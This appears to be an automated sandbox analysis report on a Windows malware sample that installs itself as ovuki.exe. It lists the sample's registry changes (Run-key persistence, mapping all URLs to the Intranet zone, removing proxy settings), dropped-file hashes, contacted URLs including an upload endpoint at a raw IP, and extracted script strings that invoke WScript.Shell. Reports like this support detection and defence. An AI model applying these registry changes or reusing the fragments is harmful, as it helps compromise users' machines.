"5119f545" = "hT6WJTQLtVeoyUyVpkuBT=Q43rzyihkKzPviQoP0sTUSg7rhAuLOZ0L3PV33TKZxgXSD0mmazlHbYFKsBZfZgtHGpZqC38MAGvaOxtyueAe25nZBHWJNKarjZDaPzH4O7CNkqn6NYjoN5827nIDX1nkj5rxQgfRv;GjCvLMXxuZpjDMmf4FWj5gM=xIxppUbz299n74DhkBfxSdB0vcIfGUK9HkmrjPFicTb7wpfUhB2bMb1tbw82bgedDH4kG3KXVjlDeb6VquQARa9OcHqjy2LU3Fi9uCi;CgYrqBQ5rPIYLyZmhouI=nRKGcR8Q3kH2mTiiLKecaboSNPzTnhwjTBwkSZStqhZzzGrQk3IXRwrIRyv77Yb6VYE804sThr168fBYFkrpV3rQvyTe3bhRTDW2CtAeBKSvqYj52vyruM0vcCtInLl5iY;zobiwOtANPxgOzZ4Js=taG6s7wLQNorEjYCS47MKbAsV4eON8qO4p2vUyMMWO8Z93XRpFcLlTVn01gdlxZCwnY;LV39O=38140F18771E1F0E1E38241E33274515061D105F1A785C0D460351051D6E01555A3C06274B190F0B000F01142B66725D28237B5A303D5F3F1F3F411E580E59235B5570212D110136270B2D204429222F2B0E1E29380A187F2C0104543C365C012711160236210D020C255626763C04266E3F105E667A0F7857781D1C392603283D15231C460B053535073D01010B0C676103667119205D3421390E491C033A174A15747A2E280A392032240A140A3D1F7F4F12091900062A3501020A1126173277296A16321A6807070F1F427A0A40784374181F1F48221B00034B503E58764B1D1D301E103A7C3F503A0820224631381"
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1206" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1809" = "3"

[HKCU\Software\e307dfcb0a]
"f4ea4294" = "875"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\e307dfcb0a]
"5119f545" = "hT6WJTQLtVeoyUyVpkuBT=Q43rzyihkKzPviQoP0sTUSg7rhAuLOZ0L3PV33TKZxgXSD0mmazlHbYFKsBZfZgtHGpZqC38MAGvaOxtyueAe25nZBHWJNKarjZDaPzH4O7CNkqn6NYjoN5827nIDX1nkj5rxQgfRv;GjCvLMXxuZpjDMmf4FWj5gM=xIxppUbz299n74DhkBfxSdB0vcIfGUK9HkmrjPFicTb7wpfUhB2bMb1tbw82bgedDH4kG3KXVjlDeb6VquQARa9OcHqjy2LU3Fi9uCi;CgYrqBQ5rPIYLyZmhouI=nRKGcR8Q3kH2mTiiLKecaboSNPzTnhwjTBwkSZStqhZzzGrQk3IXRwrIRyv77Yb6VYE804sThr168fBYFkrpV3rQvyTe3bhRTDW2CtAeBKSvqYj52vyruM0vcCtInLl5iY;zobiwOtANPxgOzZ4Js=taG6s7wLQNorEjYCS47MKbAsV4eON8qO4p2vUyMMWO8Z93XRpFcLlTVn01gdlxZCwnY;LV39O=38140F18771E1F0E1E38241E33274515061D105F1A785C0D460351051D6E01555A3C06274B190F0B000F01142B66725D28237B5A303D5F3F1F3F411E580E59235B5570212D110136270B2D204429222F2B0E1E29380A187F2C0104543C365C012711160236210D020C255626763C04266E3F105E667A0F7857781D1C392603283D15231C460B053535073D01010B0C676103667119205D3421390E491C033A174A15747A2E280A392032240A140A3D1F7F4F12091900062A3501020A1126173277296A16321A6807070F1F427A0A40784374181F1F48221B00034B503E58764B1D1D301E103A7C3F503A0820224631381"
"0494a3ce" = "1458847728"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate]
"DisableOSUpgrade" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "86 AF C0 E0 26 CB 41 E4 D6 DA 9C A9 3E 3E B9 B5"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"

[HKCU\Software\e307dfcb0a]
"5232108f" = "¡¯… SñäÐôsÃ…8,¼‚Å;QpÅ’oëDôGfÊj/›&Â¥#YW°~ ýÉ¥´E/ôñÝÙln‹[^7Ù‰ÉåS¤Øl©Czæñ xˆí·uÛÓÉ„hµññKro“´®­„Ù,ÅÀ~‡ “LãŸE D´ÉAžR°ø7A"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"2300" = "0"

[HKLM\SOFTWARE\e307dfcb0a]
"52b1e748" = "13391CC12FC38C00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1206" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1809" = "3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\OSUpgrade]
"ReservationsAllowed" = "0"

[HKCU\Software\e307dfcb0a]
"52b1e748" = "13391CC12FC38C00"

[HKLM\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"

[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"iexplore.exe" = "8888"

[HKLM\SOFTWARE\e307dfcb0a]
"0494a3ce" = "1458847728"

To run itself automatically each time Windows boots, the Malware adds the following link to its file under the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\ovuki\ovuki.exe"

The Malware modifies IE security zone settings so that all local web nodes whose names contain no dots and that are not assigned to any zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Malware modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To run itself automatically each time Windows boots, the Malware adds the following link to its file under the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"c:\documents and settings\"%CurrentUserName%"\local settings\application data\ovuki\ovuki.exe"

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

"ProxyServer"
"AutoConfigURL"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]

The Malware disables automatic startup of the application by deleting the following autorun value:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

The process regsvr32.exe:1976 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "67 B1 C9 C7 E2 94 5F 35 8F 4B 1C 84 35 A3 17 82"

The process regsvr32.exe:928 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "47 ED 54 F6 7F 78 81 43 E0 A2 43 DC 75 35 7D DE"

The process regsvr32.exe:780 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"WindowsXP-KB968930-x86-ENG.exe" = "Self-Extracting Cabinet"

[HKLM\SOFTWARE\426591DD63C42F91BAC7]
"A87E69C400006ACF" = "A87E69C400006ACF"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5A BE E4 BB 60 15 9F F6 E8 5A A3 69 AA 7B 06 E3"

[HKLM\SOFTWARE\5285EC06AD268F40039D]
"12032038D44CB20ACE" = "12032038D44CB20ACE"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Malware modifies IE security zone settings so that all local web nodes whose names contain no dots and that are not assigned to any zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Malware modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Malware modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Malware deletes the following registry key(s):

[HKLM\SOFTWARE\426591DD63C42F91BAC7]
[HKLM\SOFTWARE\5285EC06AD268F40039D]

The Malware deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"

[HKLM\SOFTWARE\5285EC06AD268F40039D]
"12032038D44CB20ACE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKLM\SOFTWARE\426591DD63C42F91BAC7]
"A87E69C400006ACF"

The process wsmanhttpconfig.exe:2740 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 5C F6 37 FD 93 48 8E 14 3B DC 98 24 37 A4 6C"

The process wsmanhttpconfig.exe:2668 makes changes in the system registry.
The Malware creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 FC 60 00 A0 2B 15 A7 FF 98 87 D1 89 A9 B0 9E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Event Forwarding Plugin]
"ConfigXML" = ""

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http://+:47001/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"80:TCP" = "80:TCP:*:Enabled:Windows Remote Management - Compatibility Mode (HTTP-In)"

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"https://+:5986/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
"5985:TCP" = "5985:TCP:*:Enabled:Windows Remote Management"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN]
"UpdatedConfig" = "6C0F31ED-80C5-4DB8-9E10-DB9BE1576FD3"

[HKLM\System\CurrentControlSet\Services\HTTP\Parameters\UrlAclInfo]
"http://+:5985/wsman/" = "01 00 04 80 00 00 00 00 00 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\WMI Provider]
"ConfigXML" = ""

Dropped PE files

MD5 File path
790b98252fc274efed657d0de64821b9 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\ovuki\ovuki.exe
9859a26d5e72bbb0685af813b409d99d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\WindowsXP-KB968930-x86-ENG.exe
fc9a05096522bb6d7ceda62ea1707420 c:\WINDOWS\$968930Uinstall_KB968930$\PSCustomSetupUtil.exe
35efd8cd6549a4339cb2a28c8cfd6598 c:\WINDOWS\$968930Uinstall_KB968930$\PSSetupNativeUtils.exe
a39df582ca051afc8811fbd00db12f10 c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\spuninst.exe
9a055da2f2819f155c33d47cd67a7c00 c:\WINDOWS\$968930Uinstall_KB968930$\spuninst\updspapi.dll
75c183e262bd4400eb0f20349f6ef383 c:\WINDOWS\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.resources.dll
2f7fe3a781ba8c0a67c775f20e3e9f70 c:\WINDOWS\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll
4e2482e69baaf3a5b13db8101c063ebf c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.resources.dll
08e87e8abf7b41b28663dce817ce0ab6 c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll
b87e087fc013225e2aa1cb60c080647d c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.resources.dll
f3ac3f844f90380aab2b4c0836c4288f c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll
1ce73fb3f88c716cfc3fd550547d2b35 c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.resources.dll
dfeb401cc051e5da721c584ff6a90f88 c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll
36ff641f37918f2cca98e7f407ac4d75 c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.resources.dll
3991b7fa452a9c9c291c06365a236792 c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll
208fa9d0ebe2ceb9616042772e96598e c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Editor\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Editor.dll
d4eefccdc3de6ced901535fa4153c491 c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.GPowerShell\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.GPowerShell.dll
3eab4dbdc290edc4d53fe77f1fdb9e59 c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.GraphicalHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.GraphicalHost.dll
c7a0d1321a67a2afd330c5fbe79befd1 c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Security.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.PowerShell.Security.resources.dll
53a9d748ef09920a0d06da2583c298ad c:\WINDOWS\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll
6372ea7d2aced7185183cf3fcdd3577b c:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Management.resources\1.0.0.0_en_31bf3856ad364e35\Microsoft.WSMan.Management.resources.dll
1a4e900c2fe3cd31d10107670d184fe6 c:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll
f7da27672d2e4c21a1f996ee31de0dbf c:\WINDOWS\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll
2286b57ecc2d32d24049c51989084268 c:\WINDOWS\assembly\GAC_MSIL\System.Management.Automation.resources\1.0.0.0_en_31bf3856ad364e35\System.Management.Automation.resources.dll
4d8ab4fad244f7985d8c59d456e026d7 c:\WINDOWS\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll
85d7ab466d0577c49fc9879107ec7ef5 c:\WINDOWS\system32\WindowsPowerShell\v1.0\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll
173d3dd1425a8e33fa1d4ed71067a3a2 c:\WINDOWS\system32\WindowsPowerShell\v1.0\Modules\BitsTransfer\microsoft.backgroundintelligenttransfer.management.interop.dll
df4217ddb34a0b73dc7aac7829371c0c c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe
fe7bc06af17d7cd8fb8e6d72d72453b8 c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe.mui
36b6f71b6d7d280302b348145db05a9f c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell_ise.exe
cb3a534127f37d0fa1f556dbb76575d3 c:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell_ise.resources.dll
95b7f12a557dedac5e4a1e9afa5e73ab c:\WINDOWS\system32\WindowsPowerShell\v1.0\pspluginwkr.dll
a94243b797377ba03b63fc716c13bcf5 c:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshmsg.dll
7943a80f1a6fd37969aacd411b511f91 c:\WINDOWS\system32\WindowsPowerShell\v1.0\pwrshsip.dll
2c9c9ae86eb2b4e78c8e09deb7509a63 c:\WINDOWS\system32\WsmAuto.dll
67146d3606be1111a39f0fd61f47e9b6 c:\WINDOWS\system32\WsmRes.dll
18f347402da544a780949b8fdf83351b c:\WINDOWS\system32\WsmSvc.dll
296e6992278fea7140d88b603e6c2a8a c:\WINDOWS\system32\WsmWmiPl.dll
8c386819bf5b39d7a4b274d0b55f87a5 c:\WINDOWS\system32\pwrshplugin.dll
84e025b1259c66315f4d45a6caecacc9 c:\WINDOWS\system32\wevtfwd.dll
cd17705af8e53a82facb545a213ab09c c:\WINDOWS\system32\winrmprov.dll
afdf7654880ce23005014895b129d948 c:\WINDOWS\system32\winrs.exe
3e9b11880ae4a8ff399ce0573c82655b c:\WINDOWS\system32\winrscmd.dll
62021e3e6ba13d72cf5cc1047cfac991 c:\WINDOWS\system32\winrshost.exe
b84092e52861a026fc83bcede4a7abfa c:\WINDOWS\system32\winrsmgr.dll
35bc7c49676e5ab617ef94dc9854a6f1 c:\WINDOWS\system32\winrssrv.dll
972916faac89c4aa978952b30f478e81 c:\WINDOWS\system32\wsmanhttpconfig.exe
23ce21efc2ae95700f2b1f9582fe3867 c:\WINDOWS\system32\wsmplpxy.dll
faa2fcc6853e5123e05dccc5919657e2 c:\WINDOWS\system32\wsmprovhost.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 3886 4096 4.17201 f4685099542889ddee7ef5d0229e59f1
.rdata 8192 2224 2560 3.18251 d3cfe8fb71be63f5067e2cad6fcd5704
.data 12288 3236 512 2.07387 f99b8e8de3b97a6e9c21177e9451b4d9
.rsrc 16384 250840 250880 5.54389 a7d66e7e7c506cc618718ae55929f22c

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://78.24.220.229/upload.php
hxxp://microsoft.com/
hxxp://e10088.dspb.akamaiedge.net/
hxxp://e10088.dspb.akamaiedge.net/uk-ua/
hxxp://e3673.dspg.akamaiedge.net/download/E/C/E/ECE99583-2003-455D-B681-68DB610B44A4/WindowsXP-KB968930-x86-ENG.exe


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

The Malware connects to the servers at the following location(s):

regsvr32.exe_436:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
wininet.dll
user32.dll
ntdll.dll
Kernel32.dll
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
PSAPI.dll
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
IWebBrowser
IWebBrowserApp
IWebBrowser2
.length;
+=String.fromCharCode(parseInt(
.substr(
,2),16));
+=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
psapi.dll
HTTP/1.1
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
0123456789
Mozilla
?456789:;<=
!"#$%&'()* ,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
@.reloc
222.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegCreateKeyA
version.dll
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
HttpSendRequestA
HttpOpenRequestA
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
ole32.dll
wsock32.dll
winmm.dll
atl.dll
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
shell32.dll
ShellExecuteExW
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
urlmon.dll
UrlMkSetSessionOption
UhwEB
Uhû
Uh'%C
Uh,
Uh1%D
